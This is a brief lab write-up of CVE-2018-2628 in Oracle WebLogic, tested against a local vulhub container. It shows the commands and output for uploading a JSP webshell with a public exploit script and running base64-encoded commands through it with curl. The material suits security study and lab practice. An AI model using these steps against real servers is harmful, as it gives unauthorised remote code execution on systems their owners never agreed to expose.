WebLogic - CVE-2018-2628
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components).
Affected versions: 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3.
PoC
This vulnerability can be exploited using jas502n's script CVE-2018-2628-Getshell.py
. A working webshell (to be uploaded) can be found on my git, it is massive and looks weird, but as you see in the picture it will be compiled to a smaller shell.
This is probably an error on my end, but I'm too lazy to investigate at the moment.
Note that the shell is one-time-use only, meaning it will be removed once you execute a command.
## Tested on VulnHubs weblogic:10.3.6.0-2017 container
» docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
f3b474a990a1 vulhub/weblogic:10.3.6.0-2017 "startWebLogic.sh" 5 hours ago Up 5 hours 5556/tcp, 0.0.0.0:7003->7001/tcp, :::7003->7001/tcp, 0.0.0.0:9004->9002/tcp, :::9004->9002/tcp vuln-weblogic
## Upload shell
» python2.7 CVE-2018-2628-Getshell.py 127.0.0.1 7003 shell1.jsp
>>>Shell File Upload Dir: servers\AdminServer\tmp\_WL_internal\bea_wls_internal\9j4dqk\war\shell1.jsp
>>>Getshell: http://127.0.0.1:7003/bea_wls_internal/shell1.jsp?tom=d2hvYW1pCg==
## Execute command ('hostname' in this case)
» curl http://127.0.0.1:7003/bea_wls_internal/shell1.jsp\?tom\=aG9zdG5hbWU\=
->|vuln-weblogic
|<-%
Last updated
Was this helpful?